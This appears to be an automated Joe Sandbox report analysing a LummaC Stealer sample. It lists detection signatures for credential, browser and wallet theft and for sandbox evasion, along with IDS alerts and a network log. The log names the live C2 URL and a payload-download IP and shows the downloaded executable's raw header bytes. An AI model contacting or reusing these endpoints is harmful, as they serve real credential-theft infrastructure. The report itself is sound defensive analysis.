Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561483
MD5:3ebf7bb70dc746683d4274c4af45c8ac
SHA1:c8e8a9ac38e48739061c5af85430db6b7524ff44
SHA256:5ace1684387f82c6460f08da599bbd3f11d56fc8e5404f5a345a099b7c64c478
Tags:exeuser-Bitsight
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Downloads executable code via HTTP
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3EBF7BB70DC746683D4274C4AF45C8AC)
    • chrome.exe (PID: 7960 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 8176 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1916,i,1287654970835858718,17769345937840610954,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7712 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 6956 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2004 --field-trial-handle=1900,i,13827317004684261514,15801404464628299724,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
{"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: file.exe PID: 7280JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: file.exe PID: 7280JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-23T14:46:12.133339+010020283713Unknown Traffic192.168.2.449730172.67.162.84443TCP
        2024-11-23T14:46:14.185710+010020283713Unknown Traffic192.168.2.449731172.67.162.84443TCP
        2024-11-23T14:46:16.736896+010020283713Unknown Traffic192.168.2.449732172.67.162.84443TCP
        2024-11-23T14:46:19.270177+010020283713Unknown Traffic192.168.2.449733172.67.162.84443TCP
        2024-11-23T14:46:21.797673+010020283713Unknown Traffic192.168.2.449734172.67.162.84443TCP
        2024-11-23T14:46:24.444969+010020283713Unknown Traffic192.168.2.449735172.67.162.84443TCP
        2024-11-23T14:46:27.216789+010020283713Unknown Traffic192.168.2.449737172.67.162.84443TCP
        2024-11-23T14:46:36.343049+010020283713Unknown Traffic192.168.2.449743172.67.162.84443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-23T14:46:12.838034+010020546531A Network Trojan was detected192.168.2.449730172.67.162.84443TCP
        2024-11-23T14:46:14.904779+010020546531A Network Trojan was detected192.168.2.449731172.67.162.84443TCP
        2024-11-23T14:46:37.052468+010020546531A Network Trojan was detected192.168.2.449743172.67.162.84443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-23T14:46:12.838034+010020498361A Network Trojan was detected192.168.2.449730172.67.162.84443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-23T14:46:14.904779+010020498121A Network Trojan was detected192.168.2.449731172.67.162.84443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-23T14:46:38.512314+010020197142Potentially Bad Traffic192.168.2.449744185.215.113.1680TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-23T14:46:17.806600+010020480941Malware Command and Control Activity Detected192.168.2.449732172.67.162.84443TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: file.exeAvira: detected
        Source: file.exe.7280.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
        Source: file.exeJoe Sandbox ML: detected
        Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
        Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
        Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
        Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49731 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49734 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49735 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49737 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49736 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49743 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49759 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49766 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49774 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49821 version: TLS 1.2

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 172.67.162.84:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 172.67.162.84:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 172.67.162.84:443
        Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 172.67.162.84:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 172.67.162.84:443
        Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49732 -> 172.67.162.84:443
        Source: Malware configuration extractorURLs: https://property-imper.sbs/api
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 13:46:38 GMTContent-Type: application/octet-streamContent-Length: 2805248Last-Modified: Sat, 23 Nov 2024 13:20:21 GMTConnection: keep-aliveETag: "6741d695-2ace00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2b 00 00 04 00 00 56 38 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 69 64 77 69 74 69 6e 76 00 80 2a 00 00 a0 00 00 00 6c 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 6a 66 62 7a 75 6a 67 00 20 00 00 00 20 2b 00 00 06 00 00 00 a6 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 2b 00 00 22 00 00 00 ac 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Source: Joe Sandbox ViewIP Address: 13.107.246.63 13.107.246.63
        Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
        Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.162.84:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 172.67.162.84:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.67.162.84:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 172.67.162.84:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 172.67.162.84:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.67.162.84:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 172.67.162.84:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 172.67.162.84:443
        Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49744 -> 185.215.113.16:80
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
        Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
        Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
        Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
        Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
        Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
        Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
        Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
        Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
        Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
        Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
        Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
        Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
        Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
        Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
        Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
        Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=oVv8Y9gncPuzzCl&MD=+dMAy9tu HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
        Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
        Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=oVv8Y9gncPuzzCl&MD=+dMAy9tu HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
        Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
